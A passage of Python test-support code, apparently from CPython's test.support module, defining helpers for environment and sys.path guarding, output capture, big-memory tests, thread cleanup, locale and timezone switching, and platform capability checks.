with check_no_warnings(testcase, category=ResourceWarning, force_gc=True):
yield
class CleanImport(object):
"""Context manager to force import to return a new module reference.
This is useful for testing module-level behaviours, such as
the emission of a DeprecationWarning on import.
Use like this:
with CleanImport("foo"):
importlib.import_module("foo") # new reference
"""
def __init__(self, *module_names):
self.original_modules = sys.modules.copy()
for module_name in module_names:
if module_name in sys.modules:
module = sys.modules[module_name]
# It is possible that module_name is just an alias for
# another module (e.g. stub for modules renamed in 3.x).
# In that case, we also need delete the real module to clear
# the import cache.
if module.__name__ != module_name:
del sys.modules[module.__name__]
del sys.modules[module_name]
def __enter__(self):
return self
def __exit__(self, *ignore_exc):
sys.modules.update(self.original_modules)
class EnvironmentVarGuard(collections.abc.MutableMapping):
"""Class to help protect the environment variable properly. Can be used as
a context manager."""
def __init__(self):
self._environ = os.environ
self._changed = {}
def __getitem__(self, envvar):
return self._environ[envvar]
def __setitem__(self, envvar, value):
# Remember the initial value on the first access
if envvar not in self._changed:
self._changed[envvar] = self._environ.get(envvar)
self._environ[envvar] = value
def __delitem__(self, envvar):
# Remember the initial value on the first access
if envvar not in self._changed:
self._changed[envvar] = self._environ.get(envvar)
if envvar in self._environ:
del self._environ[envvar]
def keys(self):
return self._environ.keys()
def __iter__(self):
return iter(self._environ)
def __len__(self):
return len(self._environ)
def set(self, envvar, value):
self[envvar] = value
def unset(self, envvar):
del self[envvar]
def __enter__(self):
return self
def __exit__(self, *ignore_exc):
for (k, v) in self._changed.items():
if v is None:
if k in self._environ:
del self._environ[k]
else:
self._environ[k] = v
os.environ = self._environ
class DirsOnSysPath(object):
"""Context manager to temporarily add directories to sys.path.
This makes a copy of sys.path, appends any directories given
as positional arguments, then reverts sys.path to the copied
settings when the context ends.
Note that *all* sys.path modifications in the body of the
context manager, including replacement of the object,
will be reverted at the end of the block.
"""
def __init__(self, *paths):
self.original_value = sys.path[:]
self.original_object = sys.path
sys.path.extend(paths)
def __enter__(self):
return self
def __exit__(self, *ignore_exc):
sys.path = self.original_object
sys.path[:] = self.original_value
class TransientResource(object):
"""Raise ResourceDenied if an exception is raised while the context manager
is in effect that matches the specified exception and attributes."""
def __init__(self, exc, **kwargs):
self.exc = exc
self.attrs = kwargs
def __enter__(self):
return self
def __exit__(self, type_=None, value=None, traceback=None):
"""If type_ is a subclass of self.exc and value has attributes matching
self.attrs, raise ResourceDenied. Otherwise let the exception
propagate (if any)."""
if type_ is not None and issubclass(self.exc, type_):
for attr, attr_value in self.attrs.items():
if not hasattr(value, attr):
break
if getattr(value, attr) != attr_value:
break
else:
raise ResourceDenied("an optional resource is not available")
# Context managers that raise ResourceDenied when various issues
# with the Internet connection manifest themselves as exceptions.
# XXX deprecate these and use transient_internet() instead
time_out = TransientResource(OSError, errno=errno.ETIMEDOUT)
socket_peer_reset = TransientResource(OSError, errno=errno.ECONNRESET)
ioerror_peer_reset = TransientResource(OSError, errno=errno.ECONNRESET)
@contextlib.contextmanager
def transient_internet(resource_name, *, timeout=30.0, errnos=()):
"""Return a context manager that raises ResourceDenied when various issues
with the Internet connection manifest themselves as exceptions."""
default_errnos = [
('ECONNREFUSED', 111),
('ECONNRESET', 104),
('EHOSTUNREACH', 113),
('ENETUNREACH', 101),
('ETIMEDOUT', 110),
# socket.create_connection() fails randomly with
# EADDRNOTAVAIL on Travis CI.
('EADDRNOTAVAIL', 99),
]
default_gai_errnos = [
('EAI_AGAIN', -3),
('EAI_FAIL', -4),
('EAI_NONAME', -2),
('EAI_NODATA', -5),
# Encountered when trying to resolve IPv6-only hostnames
('WSANO_DATA', 11004),
]
denied = ResourceDenied("Resource %r is not available" % resource_name)
captured_errnos = errnos
gai_errnos = []
if not captured_errnos:
captured_errnos = [getattr(errno, name, num)
for (name, num) in default_errnos]
gai_errnos = [getattr(socket, name, num)
for (name, num) in default_gai_errnos]
def filter_error(err):
n = getattr(err, 'errno', None)
if (isinstance(err, socket.timeout) or
(isinstance(err, socket.gaierror) and n in gai_errnos) or
(isinstance(err, urllib.error.HTTPError) and
500 <= err.code <= 599) or
(isinstance(err, urllib.error.URLError) and
(("ConnectionRefusedError" in err.reason) or
("TimeoutError" in err.reason) or
("EOFError" in err.reason))) or
n in captured_errnos):
if not verbose:
sys.stderr.write(denied.args[0] + "\n")
raise denied from err
old_timeout = socket.getdefaulttimeout()
try:
if timeout is not None:
socket.setdefaulttimeout(timeout)
yield
except nntplib.NNTPTemporaryError as err:
if verbose:
sys.stderr.write(denied.args[0] + "\n")
raise denied from err
except OSError as err:
# urllib can wrap original socket errors multiple times (!), we must
# unwrap to get at the original error.
while True:
a = err.args
if len(a) >= 1 and isinstance(a[0], OSError):
err = a[0]
# The error can also be wrapped as args[1]:
# except socket.error as msg:
# raise OSError('socket error', msg).with_traceback(sys.exc_info()[2])
elif len(a) >= 2 and isinstance(a[1], OSError):
err = a[1]
else:
break
filter_error(err)
raise
# XXX should we catch generic exceptions and look for their
# __cause__ or __context__?
finally:
socket.setdefaulttimeout(old_timeout)
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
import io
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, io.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\\n")
"""
return captured_output("stderr")
def captured_stdin():
"""Capture the input to sys.stdin:
with captured_stdin() as stdin:
stdin.write('hello\\n')
stdin.seek(0)
# call test code that consumes from sys.stdin
captured = input()
self.assertEqual(captured, "hello")
"""
return captured_output("stdin")
def gc_collect():
"""Force as many objects as possible to be collected.
In non-CPython implementations of Python, this is needed because timely
deallocation is not guaranteed by the garbage collector. (Even in CPython
this can be the case in case of reference cycles.) This means that __del__
methods may be called later than expected and weakrefs may remain alive for
longer than expected. This function tries its best to force all garbage
objects to disappear.
"""
gc.collect()
if is_jython:
time.sleep(0.1)
gc.collect()
gc.collect()
@contextlib.contextmanager
def disable_gc():
have_gc = gc.isenabled()
gc.disable()
try:
yield
finally:
if have_gc:
gc.enable()
def python_is_optimized():
"""Find if Python was built with optimizations."""
cflags = sysconfig.get_config_var('PY_CFLAGS') or ''
final_opt = ""
for opt in cflags.split():
if opt.startswith('-O'):
final_opt = opt
return final_opt not in ('', '-O0', '-Og')
_header = 'nP'
_align = '0n'
if hasattr(sys, "gettotalrefcount"):
_header = '2P' + _header
_align = '0P'
_vheader = _header + 'n'
def calcobjsize(fmt):
return struct.calcsize(_header + fmt + _align)
def calcvobjsize(fmt):
return struct.calcsize(_vheader + fmt + _align)
_TPFLAGS_HAVE_GC = 1<<14
_TPFLAGS_HEAPTYPE = 1<<9
def check_sizeof(test, o, size):
import _testcapi
result = sys.getsizeof(o)
# add GC header size
if ((type(o) == type) and (o.__flags__ & _TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & _TPFLAGS_HAVE_GC))):
size += _testcapi.SIZEOF_PYGC_HEAD
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
test.assertEqual(result, size, msg)
#=======================================================================
# Decorator for running a function in a different locale, correctly resetting
# it afterwards.
def run_with_locale(catstr, *locales):
def decorator(func):
def inner(*args, **kwds):
try:
import locale
category = getattr(locale, catstr)
orig_locale = locale.setlocale(category)
except AttributeError:
# if the test author gives us an invalid category string
raise
except:
# cannot retrieve original locale, so do nothing
locale = orig_locale = None
else:
for loc in locales:
try:
locale.setlocale(category, loc)
break
except:
pass
# now run the function, resetting the locale on exceptions
try:
return func(*args, **kwds)
finally:
if locale and orig_locale:
locale.setlocale(category, orig_locale)
inner.__name__ = func.__name__
inner.__doc__ = func.__doc__
return inner
return decorator
#=======================================================================
# Decorator for running a function in a specific timezone, correctly
# resetting it afterwards.
def run_with_tz(tz):
def decorator(func):
def inner(*args, **kwds):
try:
tzset = time.tzset
except AttributeError:
raise unittest.SkipTest("tzset required")
if 'TZ' in os.environ:
orig_tz = os.environ['TZ']
else:
orig_tz = None
os.environ['TZ'] = tz
tzset()
# now run the function, resetting the tz on exceptions
try:
return func(*args, **kwds)
finally:
if orig_tz is None:
del os.environ['TZ']
else:
os.environ['TZ'] = orig_tz
time.tzset()
inner.__name__ = func.__name__
inner.__doc__ = func.__doc__
return inner
return decorator
#=======================================================================
# Big-memory-test support. Separate from 'resources' because memory use
# should be configurable.
# Some handy shorthands. Note that these are used for byte-limits as well
# as size-limits, in the various bigmem tests
_1M = 1024*1024
_1G = 1024 * _1M
_2G = 2 * _1G
_4G = 4 * _1G
MAX_Py_ssize_t = sys.maxsize
def set_memlimit(limit):
global max_memuse
global real_max_memuse
sizes = {
'k': 1024,
'm': _1M,
'g': _1G,
't': 1024*_1G,
}
m = re.match(r'(\d+(\.\d+)?) (K|M|G|T)b?$', limit,
re.IGNORECASE | re.VERBOSE)
if m is None:
raise ValueError('Invalid memory limit %r' % (limit,))
memlimit = int(float(m.group(1)) * sizes[m.group(3).lower()])
real_max_memuse = memlimit
if memlimit > MAX_Py_ssize_t:
memlimit = MAX_Py_ssize_t
if memlimit < _2G - 1:
raise ValueError('Memory limit %r too low to be useful' % (limit,))
max_memuse = memlimit
class _MemoryWatchdog:
"""An object which periodically watches the process' memory consumption
and prints it out.
"""
def __init__(self):
self.procfile = '/proc/{pid}/statm'.format(pid=os.getpid())
self.started = False
def start(self):
try:
f = open(self.procfile, 'r')
except OSError as e:
warnings.warn('/proc not available for stats: {}'.format(e),
RuntimeWarning)
sys.stderr.flush()
return
watchdog_script = findfile("memory_watchdog.py")
self.mem_watchdog = subprocess.Popen([sys.executable, watchdog_script],
stdin=f, stderr=subprocess.DEVNULL)
f.close()
self.started = True
def stop(self):
if self.started:
self.mem_watchdog.terminate()
self.mem_watchdog.wait()
def bigmemtest(size, memuse, dry_run=True):
"""Decorator for bigmem tests.
'size' is a requested size for the test (in arbitrary, test-interpreted
units.) 'memuse' is the number of bytes per unit for the test, or a good
estimate of it. For example, a test that needs two byte buffers, of 4 GiB
each, could be decorated with @bigmemtest(size=_4G, memuse=2).
The 'size' argument is normally passed to the decorated test method as an
extra argument. If 'dry_run' is true, the value passed to the test method
may be less than the requested value. If 'dry_run' is false, it means the
test doesn't support dummy runs when -M is not specified.
"""
def decorator(f):
def wrapper(self):
size = wrapper.size
memuse = wrapper.memuse
if not real_max_memuse:
maxsize = 5147
else:
maxsize = size
if ((real_max_memuse or not dry_run)
and real_max_memuse < maxsize * memuse):
raise unittest.SkipTest(
"not enough memory: %.1fG minimum needed"
% (size * memuse / (1024 ** 3)))
if real_max_memuse and verbose:
print()
print(" ... expected peak memory use: {peak:.1f}G"
.format(peak=size * memuse / (1024 ** 3)))
watchdog = _MemoryWatchdog()
watchdog.start()
else:
watchdog = None
try:
return f(self, maxsize)
finally:
if watchdog:
watchdog.stop()
wrapper.size = size
wrapper.memuse = memuse
return wrapper
return decorator
def bigaddrspacetest(f):
"""Decorator for tests that fill the address space."""
def wrapper(self):
if max_memuse < MAX_Py_ssize_t:
if MAX_Py_ssize_t >= 2**63 - 1 and max_memuse >= 2**31:
raise unittest.SkipTest(
"not enough memory: try a 32-bit build instead")
else:
raise unittest.SkipTest(
"not enough memory: %.1fG minimum needed"
% (MAX_Py_ssize_t / (1024 ** 3)))
else:
return f(self)
return wrapper
#=======================================================================
# unittest integration.
class BasicTestRunner:
def run(self, test):
result = unittest.TestResult()
test(result)
return result
def _id(obj):
return obj
def requires_resource(resource):
if resource == 'gui' and not _is_gui_available():
return unittest.skip(_is_gui_available.reason)
if is_resource_enabled(resource):
return _id
else:
return unittest.skip("resource {0!r} is not enabled".format(resource))
def cpython_only(test):
"""
Decorator for tests only applicable on CPython.
"""
return impl_detail(cpython=True)(test)
def impl_detail(msg=None, **guards):
if check_impl_detail(**guards):
return _id
if msg is None:
guardnames, default = _parse_guards(guards)
if default:
msg = "implementation detail not available on {0}"
else:
msg = "implementation detail specific to {0}"
guardnames = sorted(guardnames.keys())
msg = msg.format(' or '.join(guardnames))
return unittest.skip(msg)
def _parse_guards(guards):
# Returns a tuple ({platform_name: run_me}, default_value)
if not guards:
return ({'cpython': True}, False)
is_true = list(guards.values())[0]
assert list(guards.values()) == [is_true] * len(guards) # all True or all False
return (guards, not is_true)
# Use the following check to guard CPython's implementation-specific tests --
# or to run them only on the implementation(s) guarded by the arguments.
def check_impl_detail(**guards):
"""This function returns True or False depending on the host platform.
Examples:
if check_impl_detail(): # only on CPython (default)
if check_impl_detail(jython=True): # only on Jython
if check_impl_detail(cpython=False): # everywhere except on CPython
"""
guards, default = _parse_guards(guards)
return guards.get(platform.python_implementation().lower(), default)
def no_tracing(func):
"""Decorator to temporarily turn off tracing for the duration of a test."""
if not hasattr(sys, 'gettrace'):
return func
else:
@functools.wraps(func)
def wrapper(*args, **kwargs):
original_trace = sys.gettrace()
try:
sys.settrace(None)
return func(*args, **kwargs)
finally:
sys.settrace(original_trace)
return wrapper
def refcount_test(test):
"""Decorator for tests which involve reference counting.
To start, the decorator does not run the test if is not run by CPython.
After that, any trace function is unset during the test to prevent
unexpected refcounts caused by the trace function.
"""
return no_tracing(cpython_only(test))
def _filter_suite(suite, pred):
"""Recursively filter test cases in a suite based on a predicate."""
newtests = []
for test in suite._tests:
if isinstance(test, unittest.TestSuite):
_filter_suite(test, pred)
newtests.append(test)
else:
if pred(test):
newtests.append(test)
suite._tests = newtests
def _run_suite(suite):
"""Run tests from a unittest.TestSuite-derived class."""
runner = get_test_runner(sys.stdout,
verbosity=verbose,
capture_output=(junit_xml_list is not None))
result = runner.run(suite)
if junit_xml_list is not None:
junit_xml_list.append(result.get_xml_element())
if not result.wasSuccessful():
if len(result.errors) == 1 and not result.failures:
err = result.errors[0][1]
elif len(result.failures) == 1 and not result.errors:
err = result.failures[0][1]
else:
err = "multiple errors occurred"
if not verbose: err += "; run in verbose mode for details"
raise TestFailed(err)
# By default, don't filter tests
_match_test_func = None
_match_test_patterns = None
def match_test(test):
# Function used by support.run_unittest() and regrtest --list-cases
if _match_test_func is None:
return True
else:
return _match_test_func(test.id())
def _is_full_match_test(pattern):
# If a pattern contains at least one dot, it's considered
# as a full test identifier.
# Example: 'test.test_os.FileTests.test_access'.
#
# Reject patterns which contain fnmatch patterns: '*', '?', '[...]'
# or '[!...]'. For example, reject 'test_access*'.
return ('.' in pattern) and (not re.search(r'[?*\[\]]', pattern))
def set_match_tests(patterns):
global _match_test_func, _match_test_patterns
if patterns == _match_test_patterns:
# No change: no need to recompile patterns.
return
if not patterns:
func = None
# set_match_tests(None) behaves as set_match_tests(())
patterns = ()
elif all(map(_is_full_match_test, patterns)):
# Simple case: all patterns are full test identifier.
# The test.bisect utility only uses such full test identifiers.
func = set(patterns).__contains__
else:
regex = '|'.join(map(fnmatch.translate, patterns))
# The search *is* case sensitive on purpose:
# don't use flags=re.IGNORECASE
regex_match = re.compile(regex).match
def match_test_regex(test_id):
if regex_match(test_id):
# The regex matches the whole identifier, for example
# 'test.test_os.FileTests.test_access'.
return True
else:
# Try to match parts of the test identifier.
# For example, split 'test.test_os.FileTests.test_access'
# into: 'test', 'test_os', 'FileTests' and 'test_access'.
return any(map(regex_match, test_id.split(".")))
func = match_test_regex
# Create a copy since patterns can be mutable and so modified later
_match_test_patterns = tuple(patterns)
_match_test_func = func
def run_unittest(*classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
_filter_suite(suite, match_test)
_run_suite(suite)
#=======================================================================
# Check for the presence of docstrings.
# Rather than trying to enumerate all the cases where docstrings may be
# disabled, we just check for that directly
def _check_docstrings():
"""Just used to check if docstrings are enabled"""
MISSING_C_DOCSTRINGS = (check_impl_detail() and
sys.platform != 'win32' and
not sysconfig.get_config_var('WITH_DOC_STRINGS'))
HAVE_DOCSTRINGS = (_check_docstrings.__doc__ is not None and
not MISSING_C_DOCSTRINGS)
requires_docstrings = unittest.skipUnless(HAVE_DOCSTRINGS,
"test requires docstrings")
#=======================================================================
# doctest driver.
def run_doctest(module, verbosity=None, optionflags=0):
"""Run doctest on the given module. Return (#failures, #tests).
If optional argument verbosity is not specified (or is None), pass
support's belief about verbosity on to doctest. Else doctest's
usual behavior is used (it searches sys.argv for -v).
"""
import doctest
if verbosity is None:
verbosity = verbose
else:
verbosity = None
f, t = doctest.testmod(module, verbose=verbosity, optionflags=optionflags)
if f:
raise TestFailed("%d of %d doctests failed" % (f, t))
if verbose:
print('doctest (%s) ... %d tests with zero failures' %
(module.__name__, t))
return f, t
#=======================================================================
# Support for saving and restoring the imported modules.
def modules_setup():
return sys.modules.copy(),
def modules_cleanup(oldmodules):
# Encoders/decoders are registered permanently within the internal
# codec cache. If we destroy the corresponding modules their
# globals will be set to None which will trip up the cached functions.
encodings = [(k, v) for k, v in sys.modules.items()
if k.startswith('encodings.')]
sys.modules.clear()
sys.modules.update(encodings)
# XXX: This kind of problem can affect more than just encodings. In particular
# extension modules (such as _ssl) don't cope with reloading properly.
# Really, test modules should be cleaning out the test specific modules they
# know they added (ala test_runpy) rather than relying on this function (as
# test_importhooks and test_pkg do currently).
# Implicitly imported *real* modules should be left alone (see issue 10556).
sys.modules.update(oldmodules)
#=======================================================================
# Threading support to prevent reporting refleaks when running regrtest.py -R
# Flag used by saved_test_environment of test.libregrtest.save_env,
# to check if a test modified the environment. The flag should be set to False
# before running a new test.
#
# For example, threading_cleanup() sets the flag is the function fails
# to cleanup threads.
environment_altered = False
# NOTE: we use thread._count() rather than threading.enumerate() (or the
# moral equivalent thereof) because a threading.Thread object is still alive
# until its __bootstrap() method has returned, even after it has been
# unregistered from the threading module.
# thread._count(), on the other hand, only gets decremented *after* the
# __bootstrap() method has returned, which gives us reliable reference counts
# at the end of a test run.
def threading_setup():
return _thread._count(), threading._dangling.copy()
def threading_cleanup(*original_values):
global environment_altered
_MAX_COUNT = 100
for count in range(_MAX_COUNT):
values = _thread._count(), threading._dangling
if values == original_values:
break
if not count:
# Display a warning at the first iteration
environment_altered = True
dangling_threads = values[1]
print("Warning -- threading_cleanup() failed to cleanup "
"%s threads (count: %s, dangling: %s)"
% (values[0] - original_values[0],
values[0], len(dangling_threads)),
file=sys.stderr)
for thread in dangling_threads:
print(f"Dangling thread: {thread!r}", file=sys.stderr)
sys.stderr.flush()
# Don't hold references to threads
dangling_threads = None
values = None
time.sleep(0.01)
gc_collect()
def reap_threads(func):
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
"""
@functools.wraps(func)
def decorator(*args):
key = threading_setup()
try:
return func(*args)
finally:
threading_cleanup(*key)
return decorator
@contextlib.contextmanager
def wait_threads_exit(timeout=60.0):
"""
bpo-31234: Context manager to wait until all threads created in the with
statement exit.
Use _thread.count() to check if threads exited. Indirectly, wait until
threads exit the internal t_bootstrap() C function of the _thread module.
threading_setup() and threading_cleanup() are designed to emit a warning
if a test leaves running threads in the background. This context manager
is designed to cleanup threads started by the _thread.start_new_thread()
which doesn't allow to wait for thread exit, whereas thread.Thread has a
join() method.
"""
old_count = _thread._count()
try:
yield
finally:
start_time = time.monotonic()
deadline = start_time + timeout
while True:
count = _thread._count()
if count <= old_count:
break
if time.monotonic() > deadline:
dt = time.monotonic() - start_time
msg = (f"wait_threads() failed to cleanup {count - old_count} "
f"threads after {dt:.1f} seconds "
f"(count: {count}, old count: {old_count})")
raise AssertionError(msg)
time.sleep(0.010)
gc_collect()
def join_thread(thread, timeout=30.0):
"""Join a thread. Raise an AssertionError if the thread is still alive
after timeout seconds.
"""
thread.join(timeout)
if thread.is_alive():
msg = f"failed to join the thread in {timeout:.1f} seconds"
raise AssertionError(msg)
def reap_children():
"""Use this function at the end of test_main() whenever sub-processes
are started. This will help ensure that no extra children (zombies)
stick around to hog resources and create problems when looking
for refleaks.
"""
global environment_altered
# Need os.waitpid(-1, os.WNOHANG): Windows is not supported
if not (hasattr(os, 'waitpid') and hasattr(os, 'WNOHANG')):
return
# Reap all our dead child processes so we don't leave zombies around.
# These hog resources and might be causing some of the buildbots to die.
while True:
try:
# Read the exit status of any child process which already completed
pid, status = os.waitpid(-1, os.WNOHANG)
except OSError:
break
if pid == 0:
break
print("Warning -- reap_children() reaped child process %s"
% pid, file=sys.stderr)
environment_altered = True
@contextlib.contextmanager
def start_threads(threads, unlock=None):
threads = list(threads)
started = []
try:
try:
for t in threads:
t.start()
started.append(t)
except:
if verbose:
print("Can't start %d threads, only %d threads started" %
(len(threads), len(started)))
raise
yield
finally:
try:
if unlock:
unlock()
endtime = starttime = time.time()
for timeout in range(1, 16):
endtime += 60
for t in started:
t.join(max(endtime - time.time(), 0.01))
started = [t for t in started if t.isAlive()]
if not started:
break
if verbose:
print('Unable to join %d threads during a period of '
'%d minutes' % (len(started), timeout))
finally:
started = [t for t in started if t.isAlive()]
if started:
faulthandler.dump_traceback(sys.stdout)
raise AssertionError('Unable to join %d threads' % len(started))
@contextlib.contextmanager
def swap_attr(obj, attr, new_val):
"""Temporary swap out an attribute with a new object.
Usage:
with swap_attr(obj, "attr", 5):
...
This will set obj.attr to 5 for the duration of the with: block,
restoring the old value at the end of the block. If `attr` doesn't
exist on `obj`, it will be created and then deleted at the end of the
block.
The old value (or None if it doesn't exist) will be assigned to the
target of the "as" clause, if there is one.
"""
if hasattr(obj, attr):
real_val = getattr(obj, attr)
setattr(obj, attr, new_val)
try:
yield real_val
finally:
setattr(obj, attr, real_val)
else:
setattr(obj, attr, new_val)
try:
yield
finally:
if hasattr(obj, attr):
delattr(obj, attr)
@contextlib.contextmanager
def swap_item(obj, item, new_val):
"""Temporary swap out an item with a new object.
Usage:
with swap_item(obj, "item", 5):
...
This will set obj["item"] to 5 for the duration of the with: block,
restoring the old value at the end of the block. If `item` doesn't
exist on `obj`, it will be created and then deleted at the end of the
block.
The old value (or None if it doesn't exist) will be assigned to the
target of the "as" clause, if there is one.
"""
if item in obj:
real_val = obj[item]
obj[item] = new_val
try:
yield real_val
finally:
obj[item] = real_val
else:
obj[item] = new_val
try:
yield
finally:
if item in obj:
del obj[item]
def strip_python_stderr(stderr):
"""Strip the stderr of a Python process from potential debug output
emitted by the interpreter.
This will typically be run on the result of the communicate() method
of a subprocess.Popen object.
"""
stderr = re.sub(br"\[\d+ refs, \d+ blocks\]\r?\n?", b"", stderr).strip()
return stderr
requires_type_collecting = unittest.skipIf(hasattr(sys, 'getcounts'),
'types are immortal if COUNT_ALLOCS is defined')
def args_from_interpreter_flags():
"""Return a list of command-line arguments reproducing the current
settings in sys.flags and sys.warnoptions."""
return subprocess._args_from_interpreter_flags()
def optim_args_from_interpreter_flags():
"""Return a list of command-line arguments reproducing the current
optimization settings in sys.flags."""
return subprocess._optim_args_from_interpreter_flags()
#============================================================
# Support for assertions about logging.
#============================================================
class TestHandler(logging.handlers.BufferingHandler):
def __init__(self, matcher):
# BufferingHandler takes a "capacity" argument
# so as to know when to flush. As we're overriding
# shouldFlush anyway, we can set a capacity of zero.
# You can call flush() manually to clear out the
# buffer.
logging.handlers.BufferingHandler.__init__(self, 0)
self.matcher = matcher
def shouldFlush(self):
return False
def emit(self, record):
self.format(record)
self.buffer.append(record.__dict__)
def matches(self, **kwargs):
"""
Look for a saved dict whose keys/values match the supplied arguments.
"""
result = False
for d in self.buffer:
if self.matcher.matches(d, **kwargs):
result = True
break
return result
class Matcher(object):
_partial_matches = ('msg', 'message')
def matches(self, d, **kwargs):
"""
Try to match a single dict with the supplied arguments.
Keys whose values are strings and which are in self._partial_matches
will be checked for partial (i.e. substring) matches. You can extend
this scheme to (for example) do regular expression matching, etc.
"""
result = True
for k in kwargs:
v = kwargs[k]
dv = d.get(k)
if not self.match_value(k, dv, v):
result = False
break
return result
def match_value(self, k, dv, v):
"""
Try to match a single stored value (dv) with a supplied value (v).
"""
if type(v) != type(dv):
result = False
elif type(dv) is not str or k not in self._partial_matches:
result = (v == dv)
else:
result = dv.find(v) >= 0
return result
_can_symlink = None
def can_symlink():
global _can_symlink
if _can_symlink is not None:
return _can_symlink
symlink_path = TESTFN + "can_symlink"
try:
os.symlink(TESTFN, symlink_path)
can = True
except (OSError, NotImplementedError, AttributeError):
can = False
else:
os.remove(symlink_path)
_can_symlink = can
return can
def skip_unless_symlink(test):
"""Skip decorator for tests that require functional symlink"""
ok = can_symlink()
msg = "Requires functional symlink implementation"
return test if ok else unittest.skip(msg)(test)
_can_xattr = None
def can_xattr():
global _can_xattr
if _can_xattr is not None:
return _can_xattr
if not hasattr(os, "setxattr"):
can = False
else:
tmp_dir = tempfile.mkdtemp()
tmp_fp, tmp_name = tempfile.mkstemp(dir=tmp_dir)
try:
with open(TESTFN, "wb") as fp:
try:
# TESTFN & tempfile may use different file systems with
# different capabilities
os.setxattr(tmp_fp, b"user.test", b"")
os.setxattr(tmp_name, b"trusted.foo", b"42")
os.setxattr(fp.fileno(), b"user.test", b"")
# Kernels < 2.6.39 don't respect setxattr flags.
kernel_version = platform.release()
m = re.match(r"2.6.(\d{1,2})", kernel_version)
can = m is None or int(m.group(1)) >= 39
except OSError:
can = False
finally:
unlink(TESTFN)
unlink(tmp_name)
rmdir(tmp_dir)
_can_xattr = can
return can
def skip_unless_xattr(test):
"""Skip decorator for tests that require functional extended attributes"""
ok = can_xattr()
msg = "no non-broken extended attribute support"
return test if ok else unittest.skip(msg)(test)
_bind_nix_socket_error = None
def skip_unless_bind_unix_socket(test):
"""Decorator for tests requiring a functional bind() for unix sockets."""
if not hasattr(socket, 'AF_UNIX'):
return unittest.skip('No UNIX Sockets')(test)
global _bind_nix_socket_error
if _bind_nix_socket_error is None:
path = TESTFN + "can_bind_unix_socket"
with socket.socket(socket.AF_UNIX) as sock:
try:
sock.bind(path)
_bind_nix_socket_error = False
except OSError as e:
_bind_nix_socket_error = e
finally:
unlink(path)
if _bind_nix_socket_error:
msg = 'Requires a functional unix bind(): %s' % _bind_nix_socket_error
return unittest.skip(msg)(test)
else:
return test
def fs_is_case_insensitive(directory):
"""Detects if the file system for the specified directory is case-insensitive."""
with tempfile.NamedTemporaryFile(dir=directory) as base:
base_path = base.name
case_path = base_path.upper()
if case_path == base_path:
case_path = base_path.lower()
try:
return os.path.samefile(base_path, case_path)
except FileNotFoundError:
return False
def detect_api_mismatch(ref_api, other_api, *, ignore=()):
"""Returns the set of items in ref_api not in other_api, except for a
defined list of items to be ignored in this check.
By default this skips private attributes beginning with '_' but
includes all magic methods, i.e. those starting and ending in '__'.
"""
missing_items = set(dir(ref_api)) - set(dir(other_api))
if ignore:
missing_items -= set(ignore)
missing_items = set(m for m in missing_items
if not m.startswith('_') or m.endswith('__'))
return missing_items
def check__all__(test_case, module, name_of_module=None, extra=(),
blacklist=()):
"""Assert that the __all__ variable of 'module' contains all public names.
The module's public names (its API) are detected automatically based on
whether they match the public name convention and were defined in
'module'.
The 'name_of_module' argument can specify (as a string or tuple thereof)
what module(s) an API could be defined in in order to be detected as a
public API. One case for this is when 'module' imports part of its public
API from other modules, possibly a C backend (like 'csv' and its '_csv').
The 'extra' argument can be a set of names that wouldn't otherwise be
automatically detected as "public", like objects without a proper
'__module__' attribute. If provided, it will be added to the
automatically detected ones.
The 'blacklist' argument can be a set of names that must not be treated
as part of the public API even though their names indicate otherwise.
Usage:
import bar
import foo
import unittest
from test import support
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, foo)
class OtherTestCase(unittest.TestCase):
def test__all__(self):
extra = {'BAR_CONST', 'FOO_CONST'}
blacklist = {'baz'} # Undocumented name.
# bar imports part of its API from _bar.
support.check__all__(self, bar, ('bar', '_bar'),
extra=extra, blacklist=blacklist)
"""
if name_of_module is None:
name_of_module = (module.__name__, )
elif isinstance(name_of_module, str):
name_of_module = (name_of_module, )
expected = set(extra)
for name in dir(module):
if name.startswith('_') or name in blacklist:
continue
obj = getattr(module, name)
if (getattr(obj, '__module__', None) in name_of_module or
(not hasattr(obj, '__module__') and
not isinstance(obj, types.ModuleType))):
expected.add(name)
test_case.assertCountEqual(module.__all__, expected)
class SuppressCrashReport:
"""Try to prevent a crash report from popping up.
On Windows, don't display the Windows Error Reporting dialog. On UNIX,
disable the creation of coredump file.
"""
old_value = None
old_modes = None
def __enter__(self):
"""On Windows, disable Windows Error Reporting dialogs using
SetErrorMode.
On UNIX, try to save the previous core file size limit, then set
soft limit to 0.
"""
if sys.platform.startswith('win'):
# see http://msdn.microsoft.com/en-us/library/windows/desktop/ms680621.aspx
# GetErrorMode is not available on Windows XP and Windows Server 2003,
# but SetErrorMode returns the previous value, so we can use that
import ctypes
self._k32 = ctypes.windll.kernel32
SEM_NOGPFAULTERRORBOX = 0x02
self.old_value = self._k32.SetErrorMode(SEM_NOGPFAULTERRORBOX)
self._k32.SetErrorMode(self.old_value | SEM_NOGPFAULTERRORBOX)
# Suppress assert dialogs in debug builds
# (see http://bugs.python.org/issue23314)
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
# no msvcrt or a release build
pass
else:
self.old_modes = {}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
old_mode = msvcrt.CrtSetReportMode(report_type,
